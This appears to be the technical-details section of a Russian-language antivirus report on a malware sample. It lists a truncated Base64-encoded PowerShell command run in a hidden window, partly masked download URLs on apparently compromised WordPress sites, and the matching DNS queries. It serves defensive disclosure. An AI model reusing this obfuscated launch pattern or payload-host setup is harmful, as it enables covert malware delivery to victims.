Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABwAG8AcgB0AHQAdwB1AD0AJwBjAG8AbQBwAHIAZQBzAHMAaQBuAGcAegB6AGMAJwA7ACQAcgBlAHAAdQByAHAAbwBzAGUAagB...
- http://www.n0####lkeeper.com/wp-content/t69/
- http://www.co#####denergytech.com/wp-content/n6/
- http://www.ne###olume2.com/wp-content/upgrade/g1z8jf7/
- DNS ASK n0####lkeeper.com
- DNS ASK co#####denergytech.com
- DNS ASK st######echnicalcollege.com
- DNS ASK su####cruiters.com
- DNS ASK ne###olume2.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABwAG8AcgB0AHQAdwB1AD0AJwBjAG8AbQBwAHIAZQBzAHMAaQBuAGcAegB6AGMAJwA7ACQAcgBlAHAAdQByAHAAbwBzAGUAagB...' (со скрытым окном)